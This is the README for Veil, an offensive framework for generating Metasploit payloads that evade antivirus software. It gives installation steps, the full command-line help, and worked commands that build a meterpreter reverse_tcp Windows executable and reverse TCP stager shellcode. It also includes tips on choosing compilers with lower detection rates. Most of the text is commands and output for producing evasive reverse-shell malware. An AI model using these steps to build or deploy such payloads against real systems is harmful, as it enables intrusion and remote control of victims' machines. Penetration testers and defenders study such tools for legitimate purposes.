Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
Veil is current under support by @ChrisTruncer
The following OSs are officially supported:
- Debian 8+
- Kali Linux Rolling 2018.1+
The following OSs are likely able to run Veil:
- Arch Linux
- Manjaro Linux
- BlackArch Linux
- Deepin 15+
- Elementary
- Fedora 22+
- Linux Mint
- Parrot Security
- Ubuntu 15.10+
- Void Linux
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
NOTE:
- Installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend commands with
sudo
or change to the root user before beginning. - Your package manager may be different to
apt
. You will also need an X server running, either on the system itself, or on your local system.
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent
This file is responsible for installing all the dependences of Veil. This includes all the WINE environment, for the Windows side of things. It will install all the necessary Linux packages and GoLang, as well as Python, Ruby and AutoIT for Windows. In addition, it will also run ./config/update-config.py
for your environment.
It includes two optional flags, --force
and --silent
:
--force ~ If something goes wrong, this will overwrite detecting any previous installs. Useful when there is a setup package update.
--silent ~ This will perform an unattended installation of everything, as it will automate all the steps, so there is no interaction for the user.
This can be ran either by doing: ./Veil.py --setup
OR ./config/setup.sh --force
.
This will generate the output file for /etc/veil/settings.py
. Most of the time it will not need to be rebuilt but in some cases you might be prompted to do so (such as a major Veil update).
It is important that you are in the ./config/
directory before executing update-config.py
. If you are not, /etc/veil/settings.py
will be incorrect and when you launch Veil you will see the following:
Main Menu
0 payloads loaded
Don't panic. Run either: ./Veil.py --config
OR cd ./config/; ./update-config.py
.
NOTE: Using Py2Exe is recommended over PyInstaller (as it has a lower detection rate).
MANUALLY Install on a Windows Computer (as this isn't done by Veil's setup):
Veil's Main Menu:
$ ./Veil.py
===============================================================================
Veil | [Version]: 3.1.6
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool
Veil>:
Help
$ ./Veil.py --help
usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
[--version] [--ip IP] [--port PORT] [--list-payloads]
[-p [PAYLOAD]] [-o OUTPUT-NAME]
[-c [OPTION=value [OPTION=value ...]]]
[--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
[--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
[--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]
Veil is a framework containing multiple tools.
[*] Veil Options:
--list-tools List Veil's tools
-t TOOL, --tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.)
--update Update the Veil framework
--setup Run the Veil framework setup file & regenerate the
configuration
--config Regenerate the Veil framework configuration file
--version Displays version and quits
[*] Callback Settings:
--ip IP, --domain IP IP address to connect back to
--port PORT Port number to connect to
[*] Payload Settings:
--list-payloads Lists all available payloads for that tool
[*] Veil-Evasion Options:
-p [PAYLOAD] Payload to generate
-o OUTPUT-NAME Output file base name for source and compiled binaries
-c [OPTION=value [OPTION=value ...]]
Custom payload module options
--msfoptions [OPTION=value [OPTION=value ...]]
Options for the specified metasploit payload
--msfvenom [] Metasploit shellcode to generate (e.g.
windows/meterpreter/reverse_tcp etc.)
--compiler pyinstaller
Compiler option for payload (currently only needed for
Python)
--clean Clean out payload folders
[*] Veil-Ordnance Shellcode Options:
--ordnance-payload PAYLOAD
Payload type (bind_tcp, rev_tcp, etc.)
[*] Veil-Ordnance Encoder Options:
--list-encoders Lists all available encoders
-e ENCODER, --encoder ENCODER
Name of shellcode encoder to use
-b \x00\x0a.., --bad-chars \x00\x0a..
Bad characters to avoid
--print-stats Print information about the encoded shellcode
$
Veil Evasion CLI
$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
sync
io
unicode/utf8
internal/syscall/windows/sysdll
unicode/utf16
syscall
strconv
reflect
encoding/binary
command-line-arguments
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Language: go
[*] Payload Module: go/meterpreter/rev_tcp
[*] Executable written to: /var/lib/veil/output/compiled/payload.exe
[*] Source code written to: /var/lib/veil/output/source/payload.go
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc
$
$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
$
Veil Ordnance CLI
$ ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 127.0.0.1 --port 4444
===============================================================================
Veil-Ordnance
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Payload Name: Reverse TCP Stager (Stage 1)
[*] IP Address: 127.0.0.1
[*] Port: 4444
[*] Shellcode Size: 287
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$
This project is licensed under the GNU General Public License v3 license.